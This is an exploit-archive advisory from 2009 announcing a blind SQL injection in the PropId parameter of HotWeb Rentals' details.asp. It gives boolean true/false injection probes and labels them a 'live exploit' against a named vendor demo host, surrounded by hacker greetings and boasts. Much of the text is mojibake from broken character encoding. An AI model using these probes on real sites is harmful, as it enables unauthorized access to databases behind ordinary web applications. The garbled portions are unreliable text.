[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : HotWeb Rentals (details.asp PropId) Blind SQL Injection Vuln
# Published : 2009-09-15
# Author : R3d-D3v!L
# Previous Title : Three Pillars Help Desk v3 (Auth Bypass) SQL Injection Vulnerability
# Next Title : efront <= 3.5.4 (database.php path) Remote File Inclusion Vulnerability


[a?¢] a?¢a?¢a?¢a?¢a?¢a?¢a?¢a?¢a?¢a?¢a?¢a?¢a?¢a?¢a?¢a?¢a?¢a?¢a?¢a?¢a?¢a?¢a?¢a?¢a?¢{?¨?3ù… ?§ù?ù?ù? ?§ù??±?-ù…ù? ?§ù??±?-ù?ù…}a?¢a?¢a?¢a?¢a?¢a?¢a?¢a?¢a?¢a?¢a?¢a?¢a?¢a?¢a?¢a?¢a?¢a?¢a?¢a?¢a?¢a?¢
[a??]
[~] Tybe:(details.asp PropId) BL!ND SQL Injection Vulnerability
[a??]
[~] Vendor: www.hotwebscripts.co.uk
[a??]
[a??] Software: HotWeb Rentals 
[a??]
[a??] author: ((??3d D3v!L))
[a??]
[a??] Date: 15.2.2009
[a??]
[a??] Home: CL053D
[a??]
[a??] contact: X@hotmail.co.jp
[a??]a??a??a??a??a??a??a??a??a??a??a??a??a??a??a??a??a??a??a??a??a??a??{DEV!L'5 of SYST3M}a??a??a??a??a??a??a??a??a??a??a??a??a??a??a??a??a??a??

[a??] ERR0R CONSOLE

WwW.XxX.CcC/details.asp?PropId=(BL!ND EV!L !NJ3c7!0N)

[a??]SECURE ALERT FR0M 7h3 R3d-D3V!L

[a??] Exploit:

[a??] TRU3 : details.asp?PropId=1+and+1=1


 [a??] FALS3 : details.asp?PropId=1+and+1=2

[a??]liv3 3xpL0!T:
[a??] TRU3 : holidayrentals.hotwebscripts.co.uk/details.asp?PropId=1+and+1=1
[a??] F4L53 :holidayrentals.hotwebscripts.co.uk/details.asp?PropId=1+and+1=2


 [a??]

N073:
R34L R3d-D3V!L WAS h3R3 ((a??X@Minhal.co.ila??))

4R48!4N-HACK3R!!?§ù?ù??±?§?μù?ù? ?§ù??1?±?¨

 [~]-----------------------------{str0ke}-----------------------------------------------------

[~] Greetz tO: {str0ke} & XP_10 & ?±ù??a ?′ù?ù? & ?§?¨ù? ?′ù??ˉ & B0rN 2 K!LL & JUPA &D3V!L-FUCK3R & ?§ù??2ù?ù??±ù?
 [~]70 ù?ALL ARAB!AN HACKER 3X3PT:LAM3RZ
[~] spechial thanks : ((dolly)) & ((7am3m)) &MAGOUSH ;) & EMAD & 0R45h3Y  

 [a??]spechial SupP0RT: MY M!ND -57R0K3-''M!Lw0RM 3MP3R0R''-''3XPLO!T-houSE''

[a??] EV!L !NS!D3 734M --- R3d-D3v!L--EXOT!C --poison scorbion --D3V!L R007

  [~]spechial FR!ND: 74M3M ?aù…ù?ù…

[~] !'M 4R48!4N 3XPL0!73R.

  [~]

[~]--------------------------------------------------------------------------------

# www.Syue.com [2009-09-15]